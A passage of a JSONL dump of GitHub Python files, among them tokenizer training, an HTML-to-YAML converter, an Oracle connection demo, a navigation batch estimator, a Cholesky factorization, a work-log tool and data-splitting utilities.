(subword)'\n )\n parser.add_argument('--minimum_droprate_score',\n type=float,\n default=0.4,\n help='minimum #(w[:-1]) / #(w)'\n )\n parser.add_argument('--minimum_branching_entropy',\n type=float,\n default=1.5,\n help='entropy of (A? | A)'\n )\n parser.add_argument('--num_units_of_wpm',\n type=int,\n default=5000,\n help='number of Word Piece Model units'\n )\n \n args = parser.parse_args()\n \n corpus_fnames = glob('{}/*.txt'.format(args.corpus_directory)) \n tokenizer_type = args.tokenizer_type\n tokenizer_fname = args.tokenizer_fname\n min_frequency = args.min_frequency\n subword_max_length = args.subword_max_length\n minimum_droprate_score = args.minimum_droprate_score\n minimum_branching_entropy = args.minimum_branching_entropy\n num_units_of_wpm = args.num_units_of_wpm\n \n print('{} corpus exist'.format(len(corpus_fnames)))\n for corpus_fname in corpus_fnames:\n print(corpus_fname)\n \n check_dirs(tokenizer_fname)\n \n if tokenizer_type == 'droprate':\n print('Training droprate score dictionary')\n builder = DroprateScoreDictionaryBuilder(corpus_fnames,\n tokenizer_fname,\n min_frequency,\n subword_max_length,\n minimum_droprate_score\n )\n elif tokenizer_type == 'branching_entropy':\n print('Training branching_entropy dictionary')\n builder = BranchingEntropyDictionaryBuilder(corpus_fnames,\n tokenizer_fname,\n min_frequency,\n subword_max_length,\n minimum_branching_entropy\n )\n elif tokenizer_type == 'wpm':\n print('Training word piece model units')\n builder = WordPieceModelBuilder(corpus_fnames,\n subword_max_length,\n tokenizer_fname,\n num_units_of_wpm\n )\n \nif __name__ == \"__main__\":\n main()","repo_name":"lovit/archive_carblog_preliminary_analysis","sub_path":"py/utils/training_tokenizer.py","file_name":"training_tokenizer.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14962365448","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 19 01:45:32 2018\r\n\"\"\"\r\n\r\nimport sys\r\nsys.path.append('../common/')\r\nimport common\r\n\r\nimport glob\r\nimport os\r\nfrom enum import Enum\r\nimport time\r\nimport pdb\r\nimport yaml\r\nimport json\r\nimport datetime\r\n\r\ndef getSourceCode(inputFilepath):\r\n sourceCode = None\r\n with open(inputFilepath, 'r', encoding=\"utf8\") as inputFile:\r\n sourceCode = inputFile.read()\r\n return sourceCode\r\n\r\nif len(sys.argv) is 1:\r\n print (\"Error: Please specify the config file path\")\r\n sys.exit()\r\n\r\n# Get config filepath from command-line parameter\r\nconfigFilePath = sys.argv[1]\r\n# configFilePath = \"C:\\\\Users\\\\drzah\\\\Desktop\\\\newspaper\\\\newspaper-project\\\\configurations\\\\download-source-code.yaml\"\r\n\r\noutputFolderPath = None\r\noutputTypeString = None\r\ndataSources = []\r\n\r\nprint (\"Loading config file: \" + configFilePath)\r\n# Extract config data from config file\r\nif os.path.exists(configFilePath):\r\n config = yaml.load(open(configFilePath))\r\n\r\n params = [\"outputFolderPath\", \"outputType\", \"dataSources\"]\r\n # Check for elements in the config file\r\n for param in params:\r\n if param not in config:\r\n print(\"Error: \" + param + \" missing in config file\")\r\n exit\r\n\r\n outputFolderPath = config[\"outputFolderPath\"]\r\n outputTypeString = config[\"outputType\"]\r\n dataSources = config[\"dataSources\"]\r\n\r\nelse:\r\n print (\"config file does not exist\")\r\n exit\r\n\r\n# Create folder if not exists\r\nif not os.path.exists(outputFolderPath):\r\n os.makedirs(outputFolderPath)\r\n \r\n# Set output type\r\noutputType = None\r\nif outputTypeString.lower() == \"yaml\":\r\n outputType = common.OutputType.YAML\r\nelif outputTypeString.lower() == \"json\":\r\n outputType = common.OutputType.JSON\r\n \r\n# TODO: Only supporting GET requests for now\r\n# For POST requests, set config.yaml format to set get/post and post data for each url \r\nfor dataSource in dataSources:\r\n \r\n publisher = dataSource['publisher']\r\n inputFolders = dataSource['inputFolders']\r\n \r\n # Get a list of article files\r\n articleSourceFiles = []\r\n for inputFolder in inputFolders:\r\n for filename in glob.iglob(inputFolder + '/**/*.html', recursive=True):\r\n articleSourceFiles.append(filename)\r\n\r\n # For each article \r\n for articleSourceFile in articleSourceFiles:\r\n print (\"working on: \" + articleSourceFile)\r\n startTime = time.time()\r\n sourceCode = getSourceCode(articleSourceFile)\r\n \r\n # Generate filename\r\n sourceFilename = os.path.basename(articleSourceFile)\r\n # Remove extension\r\n sourceFilename = os.path.splitext(sourceFilename)[0]\r\n filename = publisher + \"+\" + sourceFilename + \".src\"\r\n \r\n outputData = {}\r\n # TODO: Can we extract the url of the article given the source code?\r\n outputData['articleUrl'] = None\r\n outputData['articleName'] = publisher + \"+\" + sourceFilename\r\n outputData['publisher'] = publisher\r\n outputData['sourceCode'] = sourceCode\r\n outputData['timeDownloaded'] = str(datetime.datetime.now())\r\n \r\n\r\n # Output To File\r\n # TODO: The following logic is common here and in common.py->Article.save(..)\r\n # TODO: Refactor this and put in a common location\r\n fileContents = None\r\n extension = None\r\n if outputType == common.OutputType.YAML:\r\n fileContents = yaml.dump(outputData, default_flow_style = False)\r\n extension = \".yaml\"\r\n elif outputType == common.OutputType.JSON:\r\n fileContents = json.dumps(outputData)\r\n extension = \".json\"\r\n \r\n fullPath = os.path.join(outputFolderPath, filename + extension)\r\n outputFile = open(fullPath, 'w+')\r\n outputFile.write(fileContents)\r\n outputFile.close()\r\n \r\n endTime = time.time()\r\n timeTaken = endTime - startTime\r\n print (\"file saved. Time taken: \" + str(\"%.2f\" % timeTaken))\r\n\r\n\r\n","repo_name":"AzeemGhumman/panda-dataset","sub_path":"scripts/download-source-code/download-source-code.py","file_name":"download-source-code.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18183223504","text":"from sentry_sdk import capture_message\n\ndef wsgi_app(environ, start_response):\n data = b\"Hello, World!\\n\"\n start_response(\"200 OK\", [\n (\"Content-Type\", \"text/plain\"),\n (\"Content-Length\", str(len(data)))\n ])\n capture_message(\"This message was sent from WSGI, via Gunicorn/Gevent\")\n return iter([data])","repo_name":"singingwolfboy/sentry-wsgi-gunicorn-gevent","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17522048400","text":"# 오라클 패키지 필요: cx_Oracle\n# (윈도우) pip install cx_Oracle\n\nimport cx_Oracle as oci\n\n# 1) 연결 객체 얻어오기\nconn = oci.connect(\"scott/tiger@192.168.0.19:1521/orcl\")\nprint(conn)\n\n# 2) 커서 얻어오기\ncursor = conn.cursor()\n\n# 3) sql 문장 만들기\nsql = \"SELECT * FROM emp\"\n\n# 4) sql 문장 실행\ncursor.execute(sql)\n\ndatas = cursor.fetchall()\nfor row in datas:\n print(row[0], \">\", row[1])\nprint(datas)\n\n# 5) 커서 닫기\ncursor.close()\n\n# 6) 연결 닫기\nconn.close()","repo_name":"lovepizza132/python","sub_path":"cDBCon/basic/oracle_test.py","file_name":"oracle_test.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4378541686","text":"#!/usr/bin/python\n\nimport roslib; roslib.load_manifest('path_planning_analysis')\nimport sys\nfrom path_planning_analysis import *\nimport pylab\n\nif __name__=='__main__':\n ax = pylab.axes()\n pylab.axis('equal')\n path = RobotPath(sys.argv[1]) \n vels = path.get_velocity()\n\n x =[]\n y =[]\n for t, pose in path.poses:\n x.append(pose.x)\n y.append(pose.y)\n ax.plot(path.poses[0][1].x,path.poses[0][1].y,color=\"white\")\n ax.plot(path.poses[-1][1].x*1.1,path.poses[-1][1].y*1.1,color=\"white\")\n S = 2\n\n\n for i, (t, pose) in enumerate(path.poses):\n if i % 4 != 1:\n continue\n theta = pose.theta #+ pi\n dx = cos(theta) / 500\n dy = sin(theta) / 500\n\n ax.arrow(pose.x, pose.y, dx, dy, head_width=S*.025, head_length=S*.05, fc='red') \n\n theta, amp = vels[i]\n dx = cos(theta) / 500\n dy = sin(theta) / 500\n ax.arrow(pose.x, pose.y, dx, dy, head_width=S*.005, head_length=S*.25*amp, fc='blue') \n pylab.show()\n\n","repo_name":"DLu/path_planning_metrics","sub_path":"path_planning_analysis/src/draw_with_vel_and_headings.py","file_name":"draw_with_vel_and_headings.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9454125152","text":"\"\"\"\nThis is an example script showing how to run a batch estimator on custom \nprocess and measurement models.\n\"\"\"\n\nfrom navlie.lib import BodyFrameVelocity, RangePoseToAnchor, SE3State\nimport navlie as nav\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n # ##########################################################################\n # Create the batch estimator with desired settings\n estimator = nav.BatchEstimator(solver_type=\"GN\", max_iters=20)\n\n # ##########################################################################\n # Problem Setup\n t_end = 4\n x0 = SE3State([0, 0, 0, 0, 0, 0], stamp=0.0)\n P0 = 0.1**2 * np.identity(6)\n R = 0.1**2\n Q = np.diag([0.01**2, 0.01**2, 0.01**2, 0.1, 0.1, 0.1])\n range_models = [\n RangePoseToAnchor([1, 0, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([1, 0, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([-1, 0, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([-1, 0, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 0], [0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 0], [-0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 2], [0.17, 0.17, 0], R),\n RangePoseToAnchor([0, 2, 2], [-0.17, 0.17, 0], R),\n ]\n\n range_freqs = 20\n process_model = BodyFrameVelocity(Q)\n input_profile = lambda t, x: np.array(\n [np.sin(0.1 * t), np.cos(0.1 * t), np.sin(0.1 * t), 1, 0, 0]\n )\n\n input_freq = 100\n noise_active = True\n\n # Generate data with no noise\n dg = nav.DataGenerator(\n process_model,\n input_profile,\n Q,\n input_freq,\n range_models,\n range_freqs,\n )\n\n state_true, input_list, meas_list = dg.generate(x0, 0, t_end, noise_active)\n\n # Run batch\n estimate_list, opt_results = estimator.solve(\n x0,\n P0,\n input_list,\n meas_list,\n process_model,\n return_opt_results=True,\n )\n\n print(opt_results[\"summary\"])\n\n results = nav.GaussianResultList.from_estimates(estimate_list, state_true)\n return results\n\n\nif __name__ == \"__main__\":\n results = main()\n fig, ax = nav.plot_error(results)\n ax[-1][0].set_xlabel(\"Time (s)\")\n ax[-1][1].set_xlabel(\"Time (s)\")\n ax[0][0].set_title(\"Orientation Error\")\n ax[0][1].set_title(\"Position Error\")\n plt.show()\n","repo_name":"decargroup/navlie","sub_path":"examples/ex_batch_se3.py","file_name":"ex_batch_se3.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"69"}
+{"seq_id":"6614999616","text":"import numpy as np\n\n\ndef ldl_factorP(A):\n\n ## Pt * L * Lt * P = A\n ## L * Lt = P * A * Pt\n counter = 0\n dD = np.diag(np.sqrt(np.diag(A)))\n iD = np.diag(1.0 / np.sqrt(np.diag(A)))\n L,p, counter = __ldl_factorP__(iD.dot(A.dot(iD)),counter)\n\n P = np.eye(A.shape[0])\n P = P[p,:]\n dD = P.dot(dD.dot(P.T))\n L = dD.dot(L)\n return L, P, counter\n\n\ndef __ldl_factorP__(A,counter):\n\n nullPivotTolerance = 1e-14\n n = A.shape[0]\n\n\n perm = np.arange(n)\n L = np.zeros(A.shape)\n dA = np.diag(A)\n p = np.argmax(dA)\n perm[-1] = p\n perm[p] = n-1\n Ac = A[np.ix_(perm,perm)]\n\n if Ac[0,0] < 0 or np.abs(Ac[0,0]) < nullPivotTolerance:\n return L, perm, counter\n\n\n #print(\"Ac = \", Ac[0,0])\n l11 = np.sqrt(Ac[0,0])\n L[0,0] = l11\n\n if n > 1:\n l1 = Ac[1:,0] / l11\n A_ = Ac[1:,1:] - np.outer(l1,l1) \n L[1:,1:], pout, counter = __ldl_factorP__(A_,counter)\n perm[1:] = perm[1:][pout] \n L[1:,0] = l1[pout]\n\n counter += 1\n\n return L, perm, counter\n\nif __name__ == '__main__':\n\n A = np.array([\n [ 4.06462389e+02, 9.65043990e+02, -1.51768915e+01, 1.41151993e+02],\n [ 9.65043990e+02, 1.99313978e+04, 1.41151993e+02, 1.16119375e+04],\n [-1.51768915e+01, 1.41151993e+02, 4.06462389e+02, 9.65043990e+02],\n [ 1.41151993e+02, 1.16119375e+04, 9.65043990e+02, 1.99313978e+04]])\n\n# n = 5\n# A =np.random.rand(n,n)\n# U, s, V = np.linalg.svd(A)\n# s[-3:]=0\n# A = U.dot(np.diag(s).dot(U.T))\n L, P, rank = ldl_factorP(A)\n LLt_A = L.dot(L.T) - P.dot(A.dot(P.T))\n del0 =np.linalg.norm(LLt_A)\n print(\"L*Lt - A(p,p) = \", del0)\n print(\"rank = \", rank)\n","repo_name":"mar440/hdd","sub_path":"python-helpers/singularCholesky.py","file_name":"singularCholesky.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39862622206","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport glob\nimport re\nimport datetime\nimport pickle\nimport subprocess\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef quarter_ceil(x): #{{{\n \"\"\" round up to nearest quarter \"\"\"\n return np.ceil(x*4)/4. #}}}\n\ndef custom_round(x):\n #return quarter_ceil(x)\n return np.round(x,1)\n\ndef last_week_summary(df, numdays=7, alldetail=True): #{{{\n today = datetime.datetime.now()\n start = today - datetime.timedelta(days=numdays)\n dfs = df.loc[start.strftime('%Y-%m-%d'):today.strftime('%Y-%m-%d')]\n for projtype in np.unique(dfs.proj.values):\n print_proj_type(dfs, projtype, workdetail=False)\n if alldetail:\n for spectask in np.unique(dfs[dfs['proj'].isin([projtype])].task.values):\n print_proj_type(dfs, projtype, spectask=spectask, workdetail=True)\n print('****************************************************************************************')\n return #}}}\n\ndef print_proj_type(df, projtype='ACMEanalysis', spectask=None, workdetail=True): #{{{\n\n if spectask is not None:\n fmtstr = 'Computing detailed summary for %s: %s'\n else:\n fmtstr = '\\nTotal summary for %s: %s'\n if spectask is not None:\n print(' ')\n print(fmtstr%(projtype, ' ' if spectask is None else spectask))\n if spectask is not None:\n print('---------------------------------------------')\n\n acmework = df[df['proj'].isin([projtype])]\n if spectask is not None:\n acmework = acmework[acmework['task'].isin([spectask])]\n acmework = acmework.resample('W')\\\n .agg(hrs=('hrs', sum), \n proj=('proj',lambda x: '; '.join(x.values)),\n task=('task',lambda x: '; '.join(x.values)),\n log=('log',lambda x: '; '.join(x.values)))\n for day, hrs, log in zip(acmework.index, acmework.hrs, acmework.log):\n if not np.isnan(hrs):\n printhrs = \"(%0.1f hrs)\"%(custom_round(hrs))\n if not workdetail:\n log = ''\n print('Week of', day.date(), ' %s:'%(printhrs), log)\n \n acmework = df[df['proj'].isin([projtype])].resample('D')\\\n .agg(hrs=('hrs',sum), \n proj=('proj',lambda x: '; '.join(x.values)),\n task=('task',lambda x: '; '.join(x.values)),\n log=('log',lambda x: '; '.join(x.values)))\n for day, hrs, log in zip(acmework.index, acmework.hrs, acmework.log):\n if not np.isnan(hrs):\n printhrs = \"(%0.1f hrs)\"%(custom_round(hrs))\n if not workdetail:\n log = ''\n print('Day of', day.date(), ' %s:'%(printhrs), log)\n\n if spectask is None:\n print('****************************************************************************************')\n return #}}}\n\ndef plot_avg_hrs(df): #{{{\n fig, ax = plt.subplots(1, 1)\n (df.resample(\"1d\").sum('hrs').rolling(window=14, min_periods=1).sum()/2).plot(label='daily', ax=ax);\n (df.resample(\"1W\").sum('hrs').asfreq('d', method='backfill')).plot(label='weekly', ax=ax)\n plt.ylabel('hrs / week')\n L = plt.legend(loc='best')\n L.get_texts()[0].set_text('daily')\n L.get_texts()[1].set_text('weekly')\n plt.grid(True)\n return #}}}\n\ndef print_general_summary(df): #{{{\n now = datetime.datetime.now()\n twoweeksago = now - datetime.timedelta(13)\n end = '%02d-%02d-%02d'%(now.year, now.month, now.day)\n start = '%02d-%02d-%02d'%(twoweeksago.year, twoweeksago.month, twoweeksago.day)\n biweeklywork = df[start:end].groupby(pd.Grouper(freq='D')).sum('hrs')\n\n print('-------------------------------')\n print(' Daily hours ')\n print('-------------------------------')\n for day, hrs in zip(biweeklywork.index, biweeklywork.hrs):\n if not np.isnan(hrs):\n print('| Day ', day.date(), '|', \" %5.1f hrs |\"%(hrs))\n print('-------------------------------')\n print('Sum: %.2f hrs/week'%(biweeklywork.sum().hrs/2.0))\n\n print('\\n')\n\n #print week totals\n print('-----------------------------')\n print(' Week ending totals ')\n print('-----------------------------')\n weeks = df.resample('W').sum('hrs').tail()\n for day, hrs in zip(weeks.index, weeks.hrs):\n print('| ', day.date(), ' | ', \"%6.1f hrs |\"%(hrs))\n print('-----------------------------')\n return #}}}\n\ndef savefig(name): #{{{\n print('Saving figure to %s'%(name))\n plt.savefig(name) #}}}\n\ndef build_log(database): #{{{\n # get files organized in terms of year/month/day/daily.log\n logfiles = glob.glob(database + '/*/*/*/daily.log')\n\n tottimestamp = None\n totduration = []\n totproj = []\n tottask = []\n totlog = []\n totvalid = []\n for logfile in logfiles:\n # process raw data\n time = np.asarray([re.findall(r'..-..-.. ..:..:..', line)[0] for line in open(logfile)])\n\n def get_lines(string):\n item = [re.findall(string, line) for line in open(logfile)] \n return np.asarray([ai if ai != [] else [''] for ai in item])\n\n proj = get_lines(r'PROJ={.*?}')\n task = get_lines(r'TASK={.*?}')\n log = get_lines(r'LOG={.*?}')\n valid = [(ap != [''])[0] for ap in proj]\n\n time = pd.to_datetime(time, format='%y-%m-%d %H:%M:%S')\n\n tottimestamp = np.concatenate((tottimestamp, time)) if tottimestamp is not None else time\n totproj += proj.tolist()[:]\n tottask += task.tolist()[:]\n totlog += log.tolist()[:]\n totvalid += valid[:]\n\n hours = np.asarray([0] + [atime/np.timedelta64(1, 'h') for atime in np.diff(tottimestamp)])\n #plt.plot(tottimestamp,hours,'.'); plt.show()\n #assert hours[-1] < 3./60., 'Ending time is very large= ' + hours[-1]\n #assert proj[0] == [] and proj[-1] == [], \"Don't necessarily have good data for \" + logfile\n #assert task[0] == [] and task[-1] == [], \"Don't necessarily have good data for \" + logfile\n totvalid = np.where(totvalid)\n totproj = [item[0][6:-1] for item in np.asarray(totproj)[totvalid].tolist()]\n tottask = [item[0][6:-1] for item in np.asarray(tottask)[totvalid].tolist()]\n totlog = [item[0][5:-1] for item in np.asarray(totlog)[totvalid].tolist()]\n totduration = np.asarray(hours)[totvalid]\n totstarttime = pd.to_datetime(np.asarray(tottimestamp)[totvalid])\n totendtime = totstarttime + pd.to_timedelta(totduration, unit='h')\n\n # build dataframe\n df = pd.DataFrame({ #'start' : totstarttime,\n 'end' : totendtime,\n 'hrs' : totduration,\n 'proj' : totproj,\n 'task' : tottask,\n 'log' : totlog\n }, index=pd.Series(totstarttime))\n last_week_summary(df, alldetail=False)\n last_week_summary(df)\n # print summary\n #print_proj_type(df, projtype='ACMEanalysis')\n #print_proj_type(df, projtype='ACME')\n #print_proj_type(df, projtype='coastal')\n #print_proj_type(df, projtype='ziso')\n #print_proj_type(df, projtype='sciviz')\n print_general_summary(df)\n\n # plot of average hours:\n plot_avg_hrs(df)\n\n #plt.plot(tottimestamp,totduration,'.'); plt.show()\n\n savefig('/Users/pwolfram/hist.png')\n\n return #}}}\n\ndef folder_exists(folder, create=True, verbose=True): #{{{\n if not os.path.exists(folder):\n if create:\n print('Creating folder at ', folder)\n os.makedirs(folder)\n return False\n else:\n return True\n #}}}\n\ndef load_stored_sets(setlocation): #{{{\n if os.path.isfile(setlocation):\n with open(setlocation, 'rb') as af:\n setvalues = pickle.load(af)\n else:\n setvalues = set()\n return setvalues #}}}\n\ndef save_stored_sets(aset, setlocation): #{{{\n print('saving %s at %s'%(aset, setlocation))\n with open(setlocation, 'wb') as af:\n pickle.dump(aset, af)\n return #}}}\n\ndef sanitize_response(response): #{{{\n # separate comma separated items\n values = response.split(',')\n # remove spaces in front or back of string\n values = [av.rstrip() for av in values]\n values = [av.lstrip() for av in values]\n return values #}}}\n\ndef make_log_entry(logfile, timestamp, projname, taskname, entry): #{{{\n with open(logfile, 'a') as lf:\n if entry == 'START' or entry == 'END':\n log = entry + '\\n'\n else:\n log = 'PROJ={' + projname + '}, TASK={' + taskname + '}, LOG={' + entry + '}\\n'\n line = timestamp + '\\t '+ log\n lf.write(line)\n print('wrote:\\n %s to\\n%s'%(line, logfile))\n return #}}}\n\ndef undo_log_entry(logfile, timestamp): #{{{\n # remove last line\n with open(logfile, 'r+') as lf:\n lines = lf.readlines()\n lastline = lines[-1]\n lf.seek(0)\n for li in lines[:-1]:\n lf.write(li)\n lf.truncate()\n\n undofile = logfile + '.undo'\n with open(undofile, 'a') as lf:\n undoline = 'Undo at %s:'%(timestamp) + lastline\n lf.write(undoline)\n print('wrote:\\n %s to\\n%s'%(undoline, undofile))\n return #}}}\n\n\ndef file_locations(database): #{{{\n now = datetime.datetime.now()\n yearfolder = database + '/' + \"%.4d\"%(now.year)\n monthfolder = yearfolder + '/' + \"%.2d\"%(now.month)\n dayfolder = monthfolder + '/' + \"%.2d\"%(now.day)\n logfile = dayfolder + '/' + 'daily.log'\n timestamp = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # make sure file locations are available\n for afold in [database, yearfolder, monthfolder, dayfolder]:\n folder_exists(afold)\n\n return logfile, timestamp #}}}\n\ndef print_items(prompt, items, nitems=3): #{{{\n # break items up into sets of 5\n print(\"================================================================================\")\n print(prompt)\n print(\"--------------------------------------------------------------------------------\")\n thelist = list(items)\n n = len(thelist)\n for i in np.arange(int(np.ceil(n/float(nitems)))):\n print(thelist[nitems*i:(nitems*i+nitems)])\n print(\"================================================================================\")\n return #}}}\n\ndef log_work(database, start, end, undo): #{{{\n\n logfile, timestamp = file_locations(database)\n\n projectfile = database + '/projects.p'\n projects = load_stored_sets(projectfile)\n\n taskfile = database + '/tasks.p'\n tasks = load_stored_sets(taskfile)\n\n if undo:\n undo_log_entry(logfile, timestamp)\n elif start:\n make_log_entry(logfile, timestamp, '', '', 'START')\n elif end:\n make_log_entry(logfile, timestamp, '', '', 'END')\n # print summary at closeout\n build_log(database)\n else:\n print_items('Projects', sorted(projects))\n response = input(\"Please enter project names, e.g., 'proj1, proj2, etc':\\n\")\n projname = sanitize_response(response)\n projects = projects | set(projname)\n\n print_items('Tasks', sorted(tasks))\n response = input(\"Please enter task names, e.g., 'analysis, lit_review, misc':\\n\")\n taskname = sanitize_response(response)\n tasks = tasks | set(taskname)\n\n entry = input(\"Please log entry:\\n\")\n # refresh time stamp to follow once entry is committed\n logfile, timestamp = file_locations(database)\n make_log_entry(logfile, timestamp, ','.join(projname), ','.join(taskname), entry)\n\n save_stored_sets(projects, projectfile)\n save_stored_sets(tasks, taskfile)\n return #}}}\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-d\", \"--database_location\", dest=\"database\", help=\"Location for work database\", metavar=\"FOLDER\")\n parser.add_option(\"-s\", \"--start\", dest=\"start\", help=\"Starting entry\", action='store_true')\n parser.add_option(\"-e\", \"--end\", dest=\"end\", help=\"Ending entry\", action='store_true')\n parser.add_option(\"-l\", \"--log\", dest=\"log\", help=\"Make analyzable log\", action='store_true')\n parser.add_option(\"-u\", \"--undo\", dest=\"undo\", help=\"Undo last entry\", action='store_true')\n parser.add_option(\"-p\", \"--print\", dest=\"printlog\", help=\"Print daily work log\", action='store_true')\n parser.add_option(\"-r\", \"--edit\", dest=\"editlog\", help=\"Edit daily work log\", action='store_true')\n parser.add_option(\"-x\", \"--editsource\", dest=\"editsource\", help=\"Edit source script\", action='store_true')\n parser.set_defaults(start=False, end=False, undo=False, printlog=False)\n\n\n options, args = parser.parse_args()\n if not options.database:\n options.database = os.path.expanduser('~') + '/Documents/WorkLogDatabase'\n\n source = sys.argv[0]\n print(\"Using database at \" + options.database + \" with script at \" + source)\n\n if options.printlog:\n logfile, timestamp = file_locations(options.database)\n print(\"================================================================================\")\n print('Current time is %s'%(timestamp))\n print('Outputing daily log %s:'%(logfile))\n print(\"--------------------------------------------------------------------------------\")\n with open(logfile,'r') as lf:\n print(lf.read())\n lf.close()\n print(\"--------------------------------------------------------------------------------\")\n print(logfile)\n elif options.editlog:\n logfile, timestamp = file_locations(options.database)\n edit_call = [ \"mvim\", logfile]\n edit = subprocess.Popen(edit_call)\n elif options.editsource:\n edit_call = [\"mvim\", source]\n edit = subprocess.Popen(edit_call)\n elif options.log:\n # build the log database\n build_log(options.database)\n else:\n log_work(options.database, options.start, options.end, options.undo)\n","repo_name":"pwolfram/scrIpT","sub_path":"work_log.py","file_name":"work_log.py","file_ext":"py","file_size_in_byte":14155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29116916864","text":"from dados import produtos, pessoas, qualquercoisa\n# forma usando a função map()\n# nov_list = map(lambda x:x * 2, qualquercoisa) #multiplicando os valores da nova lista\n# print(nov_list)\n# print(list(nov_list))\n#\n# print('forma usando o list comprehesion')\n# lista_compreendida = [x * 2 for x in qualquercoisa]\n# print(lista_compreendida)\n\ndef aumenta_preco(p):\n p['preco'] = round(p['preco'] * 1.05, 2)\n return p\n\nprecos = map(lambda p: p['preco'], produtos) #acessando a coluna de preco\n\nnovo_preco = map(aumenta_preco, produtos)\n\nprint(list(novo_preco))\nprint('usando a lista de nomes, alterando as idades \\n')\n\n#nomes = map(lambda p:p['nome'], pessoas) #pegando os nomes das pessoas\ndef aumenta_idade(p):\n p['nova_idade'] = round(p['idade'] * 1.20)\n return p\n\nnomes = map(aumenta_idade, pessoas)\n\nfor n in nomes:\n print(n)","repo_name":"AdrianaViabL/Curso-Python-udemy","sub_path":"2 - python intermediario/73 - map/mapeamento.py","file_name":"mapeamento.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24620982611","text":"from PyPDF2 import PdfFileMerger, PdfFileReader\n\nimport os\n# os.getcwd() : 다른 폴더에서 추출하기 위한 용도\n\ndef pdf_merger(file):\n merger = PdfFileMerger()\n for items in os.listdir():\n if items.endswith('.pdf'):\n merger.append(items)\n merger.write(\"Final_pdf.pdf\")\n merger = PdfFileMerger()\n with open(file, 'rb') as f:\n merger.append(PdfFileReader(f))\n merger.close()\n \nif __name__=='__main__':\n file = input(\"현재 폴더에 있는 pdf 파일들을 합칠 원본 pdf 파일을 입려하세요 : \")\n pdf_merger(file)\n","repo_name":"sean-baek/toy_project","sub_path":"py/merge_multiple_pdf.py","file_name":"merge_multiple_pdf.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30308705227","text":"\"\"\"\nUtility functions for working with DataFrames.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\n\ndef train_validate_test_split(X, y, train_percent=60, validate_percent=20, seed=None):\n \"\"\"\n function to split X DataFrame/array and y vector into train, test and validate components\n :param X: array or DataFrame\n :param y: vector\n :param train_percent: (optional) train df percentage\n :param validate_percent: (optional) train df percentage\n :param seed: (optional) seed to maintain consistent results\n :return: Either: three dataframes/arrays and three vectors -\n X_train, X_test, X_val, y_train, y_test, y_val\n Or: tuple with: (-1, \"Error message\", None, None, None, None)\n\n to invoke, use code similar ot this:\n X_train, X_test, X_val, y_train, y_test, y_val = train_validate_test_split(X,\n y,\n train_percent=70,\n validate_percent=15,\n seed=321)\n Error checking should be done similar to ths:\n if not isinstance(X_train, pd.DataFrame):\n if X_train == -1:\n print(\"train_validate_test_split call failed - cause:\", X_test)\n \"\"\"\n\n if not (isinstance(train_percent, int) or isinstance(train_percent, float)):\n return -1, \"Non-numeric Train Set Percentage passed = \" + train_percent,\\\n None, None, None, None\n\n if not (isinstance(validate_percent, int) or isinstance(validate_percent, float)):\n return -1, \"Non-numeric Validation Set Percentage passed = \" + validate_percent,\\\n None, None, None, None\n\n if (train_percent + validate_percent) > 100:\n return -1, \"Input Percentages > 100\", None, None, None, None\n\n if seed is None:\n pass\n elif not (isinstance(seed, int)):\n return -1, \"Non-integer seed passed = \" + seed, None, None, None, None\n else:\n np.random.seed(seed)\n\n test_size = (100 - (train_percent + validate_percent))/100\n \n val_size = validate_percent / (train_percent + validate_percent)\n\n temp_x, X_test, temp_y, y_test = train_test_split(X, y, test_size=test_size)\n\n X_train, X_val, y_train, y_val = train_test_split(temp_x, temp_y, test_size=val_size)\n\n return X_train, X_test, X_val, y_train, y_test, y_val\n\nstates = {\n \"AL\": \"Alabama\",\n \"AK\": \"Alaska\",\n \"AZ\": \"Arizona\",\n \"AR\": \"Arkansas\",\n \"CA\": \"California\",\n \"CO\": \"Colorado\",\n \"CT\": \"Connecticut\",\n \"DC\": \"District of Columbia\",\n \"DE\": \"Delaware\",\n \"FL\": \"Florida\",\n \"GA\": \"Georgia\",\n \"HI\": \"Hawaii\",\n \"ID\": \"Idaho\",\n \"IL\": \"Illinois\",\n \"IN\": \"Indiana\",\n \"IA\": \"Iowa\",\n \"KS\": \"Kansas\",\n \"KY\": \"Kentucky\",\n \"LA\": \"Louisiana\",\n \"ME\": \"Maine\",\n 